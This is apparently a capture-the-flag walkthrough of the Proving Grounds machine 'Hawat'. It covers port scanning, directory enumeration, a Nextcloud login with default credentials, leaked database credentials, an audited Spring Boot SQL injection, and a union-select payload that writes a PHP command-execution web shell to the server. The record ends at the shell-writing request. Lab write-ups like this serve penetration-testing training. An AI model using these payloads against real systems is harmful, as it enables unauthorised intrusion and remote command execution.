Hawat-Proving Grounds Practice
Exploitation walkthrough
nmap
- nmap fast full-port scan
┌──(root㉿Learning)-[~]
└─# nmap -sS -Pn -n --open --min-hostgroup 4 --min-parallelism 1024 --host-timeout 30 -T4 -v -p- 192.168.208.147
Warning: Your --min-parallelism option is pretty high! This can hurt reliability.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-26 14:14 CST
Initiating SYN Stealth Scan at 14:14
Scanning 192.168.208.147 [65535 ports]
Discovered open port 22/tcp on 192.168.208.147
Discovered open port 17445/tcp on 192.168.208.147
Discovered open port 30455/tcp on 192.168.208.147
192.168.208.147 timed out during SYN Stealth Scan (0 hosts left)
Completed SYN Stealth Scan at 14:14, 30.12s elapsed (1 host timed out)
Nmap scan report for 192.168.208.147
Host is up (0.14s latency).
Skipping host 192.168.208.147 due to host timeout
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 30.21 seconds
Raw packets sent: 114701 (5.047MB) | Rcvd: 24 (1.040KB)
- Slow full-port scan
┌──(root㉿Learning)-[~]
└─# nmap -p- 192.168.208.147
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-26 14:16 CST
Nmap scan report for 192.168.208.147
Host is up (0.099s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
111/tcp closed rpcbind
139/tcp closed netbios-ssn
443/tcp closed https
445/tcp closed microsoft-ds
17445/tcp open unknown
30455/tcp open unknown
50080/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 376.11 seconds
- Detailed service scan
┌──(root㉿Learning)-[~]
└─# nmap -p 22,111,139,443,445,17445,30455,50080 -sC -sV 192.168.208.147
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-26 14:25 CST
Nmap scan report for 192.168.208.147
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4 (protocol 2.0)
| ssh-hostkey:
| 3072 78:2f:ea:84:4c:09:ae:0e:36:bf:b3:01:35:cf:47:22 (RSA)
| 256 d2:7d:eb:2d:a5:9a:2f:9e:93:9a:d5:2e:aa:dc:f4:a6 (ECDSA)
|_ 256 b6:d4:96:f0:a4:04:e4:36:78:1e:9d:a5:10:93:d7:99 (ED25519)
111/tcp closed rpcbind
139/tcp closed netbios-ssn
443/tcp closed https
445/tcp closed microsoft-ds
17445/tcp open unknown
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| Cache-Control: no-cache, no-store, max-age=0, must-revalidate
| Pragma: no-cache
| Expires: 0
| X-Frame-Options: DENY
| Content-Type: text/html;charset=UTF-8
| Content-Language: en-US
| Date: Mon, 26 Aug 2024 06:25:51 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="UTF-8">
| <title>Issue Tracker</title>
| <link href="/css/bootstrap.min.css" rel="stylesheet" />
| </head>
| <body>
| <section>
| <div class="container mt-4">
| <span>
| <div>
| href="/login" class="btn btn-primary" style="float:right">Sign In</a>
| href="/register" class="btn btn-primary" style="float:right;margin-right:5px">Register</a>
| </div>
| </span>
| <br><br>
| <table class="table">
| <thead>
| <tr>
| <th>ID</th>
| <th>Message</th>
| <th>P
| HTTPOptions:
| HTTP/1.1 200
| Allow: GET,HEAD,OPTIONS
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| Cache-Control: no-cache, no-store, max-age=0, must-revalidate
| Pragma: no-cache
| Expires: 0
| X-Frame-Options: DENY
| Content-Length: 0
| Date: Mon, 26 Aug 2024 06:25:51 GMT
| Connection: close
| RTSPRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Mon, 26 Aug 2024 06:25:51 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
| Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_ Request</h1></body></html>
30455/tcp open http nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: W3.CSS
50080/tcp open http Apache httpd 2.4.46 ((Unix) PHP/7.4.15)
|_http-title: W3.CSS Template
|_http-server-header: Apache/2.4.46 (Unix) PHP/7.4.15
| http-methods:
|_ Potentially risky methods: TRACE
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.69 seconds
dirsearch
- Site on port 50080
┌──(root㉿Learning)-[~/Desktop/tools/SpringBoot-Scan]
└─# dirsearch -u http://192.168.208.147:50080 -x 404
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/tools/SpringBoot-Scan/reports/http_192.168.208.147_50080/_24-08-26_14-30-13.txt
Target: http://192.168.208.147:50080/
[14:30:13] Starting:
[14:30:23] 301 - 239B - /4 -> http://192.168.208.147:50080/4/
[14:30:43] 301 - 243B - /cloud -> http://192.168.208.147:50080/cloud/
[14:30:44] 302 - 0B - /cloud/ -> http://192.168.208.147:50080/cloud/index.php/login
[14:30:48] 403 - 994B - /error/
[14:30:53] 200 - 1KB - /images/
[14:30:53] 301 - 244B - /images -> http://192.168.208.147:50080/images/
- Site on port 17445
┌──(root㉿Learning)-[~]
└─# dirsearch -u http://192.168.208.147:17445 -x 404
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/reports/http_192.168.208.147_17445/_24-08-26_14-30-00.txt
Target: http://192.168.208.147:17445/
[14:30:00] Starting:
[14:30:09] 400 - 435B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[14:30:10] 400 - 435B - /a%5c.aspx
[14:30:42] 200 - 1KB - /login
[14:30:42] 302 - 0B - /logout -> http://192.168.208.147:17445/index
[14:30:53] 200 - 2KB - /register
- Port 30455: just a single phpinfo page
┌──(root㉿Learning)-[/home/nosuger]
└─# dirsearch -u 192.168.208.147:30455 -x 404
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/nosuger/reports/_192.168.208.147_30455/_24-08-26_14-51-37.txt
Target: http://192.168.208.147:30455/
[14:51:37] Starting:
[14:51:45] 301 - 169B - /4 -> http://192.168.208.147:30455/4/
[14:52:21] 200 - 68KB - /phpinfo.php
- From here we can see that phpinfo.php is located at /srv/http/phpinfo.php
- Visiting the site: judging from the error page, the application is Spring Boot.
- Log in to Nextcloud with the weak credentials admin/admin
- On Nextcloud we find the source code of the issuetracker site running on port 17445
Contents of application.properties:
spring.datasource.url=jdbc:mysql://localhost:3306/issue_tracker?serverTimeZone=UTC
spring.datasource.username=issue_user
spring.datasource.password=ManagementInsideOld797
spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver
spring.jpa.hibernate.ddl-auto=update
server.port=17445
- Auditing the code reveals a SQL injection in \issuetracker\src\main\java\com\issue\tracker\issues
@GetMapping("/issue/checkByPriority")
public String checkByPriority(@RequestParam("priority") String priority, Model model) {
    //
    // Custom code, need to integrate to the JPA
    //
    Properties connectionProps = new Properties();
    connectionProps.put("user", "issue_user");
    connectionProps.put("password", "ManagementInsideOld797"); // database credentials hard-coded in the controller
    try {
        conn = DriverManager.getConnection("jdbc:mysql://localhost:3306/issue_tracker", connectionProps);
        // The request parameter is concatenated straight into the SQL text: this is the injection point
        String query = "SELECT message FROM issue WHERE priority='" + priority + "'";
        System.out.println(query);
        Statement stmt = conn.createStatement();
        stmt.executeQuery(query); // executed, but the result set is never used
    } catch (SQLException e1) {
        // TODO Auto-generated catch block
        e1.printStackTrace();
    }
    // TODO: Return the list of the issues with the correct priority
    List<Issue> issues = service.GetAll();
    model.addAttribute("issuesList", issues);
    return "issue_index";
}
- The response says GET is not allowed, so try POST
- Time-based injection is present
POST /issue/checkByPriority?priority=a HTTP/1.1
Host: 192.168.208.147:17445
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
DNT: 1
Sec-GPC: 1
Connection: close
Cookie: JSESSIONID=30088FF3AD052A6051D2780EE5703394
Upgrade-Insecure-Requests: 1
Priority: u=0, i
X-Forwarded-For: 208.54.104.184
X-Real-Ip: 208.54.104.184
- Writing a shell through the SQL injection
' union select '<?php system($_GET["cmd"]); ?>' into outfile '/srv/http/shell.php' -- -
POST /issue/checkByPriority?priority=%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%73%79%73%74%65%6d%28%24%5f%47%45%54%5b%22%63%6d%64%22%5d%29%3b%20%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%73%72%76%2f%68%74%74%70%2f%73%68%65%6c%6c%2e%70%68%70%27%20%2d%2d%20%2d HTTP/1.1
Host: 192.168.208.147:17445
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
DNT: 1
Sec-GPC: 1
Connection: close
Cookie: JSESSIONID=EC38F554A66AC8357BC260892A329708
Upgrade-Insecure-Requests: 1
Priority: u=0, i
X-Forwarded-For: 208.54.104.184
X-Real-Ip: 208.54.104.184